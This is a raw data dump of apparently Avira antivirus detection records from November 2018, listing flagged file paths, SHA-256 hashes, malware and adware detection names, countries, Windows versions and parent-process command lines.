  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T06:35:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-171920-0033bdd2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_00724c0d\\AVSCAN-20181102-171356-C21D45C4\\AVSCAN-20181102-171920-0033BDD2', filesize=5600000, name='PUA/MyPCBackup.#M1.#R1'), hash='6faf0ee307903290e31e2097dae91d0439aa112ba2e53a53f9f23ef5798e1a82', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:17:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sync.exe', filepath='C:\\Users\\pr\\AppData\\Roaming\\13FD57~1\\sync.exe', filesize=2112000, name='Adware/DealPly.676f9c.#M1.#R1'), hash='676f9c2643954a348f02805641c525fb2a86d7840381d15949684d202f492c4a', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T16:03:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='music.scr', filepath='C:\\Users\\X\\Music\\Sample Music\\Music.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T03:10:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered darom', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered darom', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='4b541787c8033f59b44a25777f2a2f4a3037447f688288976f253ea07a26f3e8', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:11:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='en-us.exe', filepath='I:\\ألعاب\\Games 1\\اندر جرون الجديدة\\TRACKS\\Support\\en-us\\en-us.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='17a9a38c64d2134df3247b8862ab2b03e72125afe4a474a1710510651bc1362d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-072524-5c294b6d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_06d4b483\\AVSCAN-20181102-071251-0D71455A\\AVSCAN-20181102-072524-5C294B6D', filesize=512000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='579734bcadd81b62f9d20302a6b5e4144196ab381abbf0f5a3a81ee484011f72', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:25:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:14:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='audiodg.exe', filepath='C:\\Windows\\System32\\audiodg.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='59d42f667f52e4572ae41eba26f810867c3a9b041622fb5bbbc5818e8f6f7fe8', metadata=Row(cmdline='-k secsvcs', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T14:59:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sync.exe', filepath='C:\\Users\\pr\\AppData\\Roaming\\13FD57~1\\sync.exe', filesize=2112000, name='Adware/DealPly.676f9c.#M1.#R1'), hash='676f9c2643954a348f02805641c525fb2a86d7840381d15949684d202f492c4a', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T16:03:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='downloader-fuer-essentialpim4.exe', filepath='G:\\Neue Downloads\\Downloader-fuer-EssentialPIM4.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='57cae62020ab1d6334a5869e4072e9ecca8566d9238618472c6da7a390ccce1b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T14:05:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcoded_000', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\Transcoded_000', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='43877a9f5547e0026d047c4a9e046cba684c1fc74edbe3907a6e0292aca1ce6d', metadata=Row(cmdline='\\\\\\/LOADSAVEDWINDOWS', country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T23:59:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='reg.exe', filepath='E:\\WINDOWS\\system32\\reg.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='484fe1059b13b83fe1a3d923164822720122717439d4069c9595ee7eb13f51d5', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:59:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1c31a9cbfc6550f82bdcef0125262cb6d97bd4f40aef977f4d78dd54dc0d5101', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1C31A9CBFC6550F82BDCEF0125262CB6D97BD4F40AEF977F4D78DD54DC0D5101', filesize=1156000, name='PUA/SoftPulse.oant.#M1.#R1'), hash='1c31a9cbfc6550f82bdcef0125262cb6d97bd4f40aef977f4d78dd54dc0d5101', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:28:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-145923-3f0f8d64', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e7ea83a2\\AVSCAN-20181102-145856-3A47D989\\AVSCAN-20181102-145923-3F0F8D64', filesize=2624000, name='HEUR/AGEN.1017528.#M1.#R1'), hash='2e4ed3a37739b247a9a395139983a0fbd87c450b1043f7cb7002136608c2c585', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T13:59:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-03-00-43-38.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-26T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T20:23:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:35:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-211152-cd0302af', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2eb1b43c\\AVSCAN-20181102-210813-AE62A200\\AVSCAN-20181102-211152-CD0302AF', filesize=788000, name='PUA/DNSBlock.#M1.#R1'), hash='6fed83ce7f539d48185dc7329823f199c509f9c04401cdfb82b83140f4bf74f6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T20:11:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transfer.exe', filepath='\\\\?\\C:\\C-GEO\\bin\\transfer.exe', filesize=640000, name='HEUR/APC.#M1.#R1'), hash='3f55ca75850001e31add3eb2261f3453e9d7a3f4648f9cbb76266171908c75b1', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T18:08:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0ce513747beec6a221dddede19b418cb105502523b3b2dc34eada58e1b56c4e6', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-20\\0CE513747BEEC6A221DDDEDE19B418CB105502523B3B2DC34EADA58E1B56C4E6', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0ce513747beec6a221dddede19b418cb105502523b3b2dc34eada58e1b56c4e6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:17:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yamgeneric001.exe', filepath='\\\\?\\C:\\Windows\\yamgeneric001.exe', filesize=3840000, name='SPR/BitCoin.R.17.#M1.#R1'), hash='123ddc718d5557233de61371644f83948c59c12e897ff58dec883c64e22aaf3b', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:51:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='21fecdb50061690e6b36b8c19e72a9dc7f59bc25ff5c3b2c5ff0203fc42665ea', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-29\\21FECDB50061690E6B36B8C19E72A9DC7F59BC25FF5C3B2C5FF0203FC42665EA', filesize=1544000, name='PUA/InstallCore.Gen.#M300.#R8158'), hash='21fecdb50061690e6b36b8c19e72a9dc7f59bc25ff5c3b2c5ff0203fc42665ea', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:22:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:45:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:50:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:53:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:04:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:19:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:28:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:37:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:04:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-161753-4a9aafd1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_668bca38\\AVSCAN-20181102-161640-4307E30A\\AVSCAN-20181102-161753-4A9AAFD1', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:17:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa2708.11157\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa2708.11157\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T08:16:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-194147-4b8d0092', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-193911-3877A267\\AVSCAN-20181102-194147-4B8D0092', filesize=1024000, name='Adware/CsdiMonetize.tygrq.#M1.#R1'), hash='2d0d1b5b0610e0163d0d7ac12d5c0810b882f929c789ae3d1b6039214139c2d4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:41:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='07c59e235f5bfee95665a1877145bd9ee84f0f9ea8bf3a77bf33d1bc3e92c4ce', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\07C59E235F5BFEE95665A1877145BD9EE84F0F9EA8BF3A77BF33D1BC3E92C4CE', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='07c59e235f5bfee95665a1877145bd9ee84f0f9ea8bf3a77bf33d1bc3e92c4ce', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:14:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:08:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:47:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1ee6cd3776d8bfa716073fdc143e6e1736375d764749c6d161ce717bd53552f3.mrg', filepath='D:\\TotalAutomation\\CategorizationLayer\\01.12.2017-163.available\\Avira\\Others\\PE-detected-Avira\\HEUR.AGEN.1029864\\1ee6cd3776d8bfa716073fdc143e6e1736375d764749c6d161ce717bd53552f3.MRG', filesize=320000, name='HEUR/AGEN.1029864.#M1.#R1'), hash='1ee6cd3776d8bfa716073fdc143e6e1736375d764749c6d161ce717bd53552f3', metadata=Row(cmdline='D:\\\\\\\\TotalAutomation\\\\\\\\CategorizationLayer\\\\\\\\01.12.2017-26.available\\\\\\\\Avira\\\\\\\\Others\\\\\\\\PE-detected-Avira -PERHASH', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\TotalAutomation\\Dependencies\\Buf\\WWPERHASH.exe', parentsize=1842176, timestamp='2018-11-02T11:19:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-051114-d358a1b6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6122e679\\AVSCAN-20181103-044944-1F899F70\\AVSCAN-20181103-051114-D358A1B6', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:11:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa8216.25182\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa8216.25182\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T09:50:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-185956-c63a8620', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_98d4435e\\AVSCAN-20181102-185941-C45444E1\\AVSCAN-20181102-185956-C63A8620', filesize=2560000, name='TR/Black.Gen2.#M1.#R1'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T11:00:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:33:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='haiti.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\DATA\\MAPS\\HAITI\\HAITI.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='494844277621873581a54f2baae4fdf5bc8b3c77b85ae4b07d8c094ff7a9bed8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052140-261586c8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052140-261586C8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054230-0f2f3e9b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054230-0F2F3E9B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-113801-1ef504f9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7848c3b7\\AVSCAN-20181102-113742-1B29F806\\AVSCAN-20181102-113801-1EF504F9', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:38:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp000008b2', filepath='C:\\Windows\\Temp\\tmp00000098\\tmp000008b2', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T19:44:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061437-8bf440fd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061437-8BF440FD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-130027-1a712691', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-130027-1A712691', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:03:33Z'), dt=datetime.date(2018, 11, 2)),
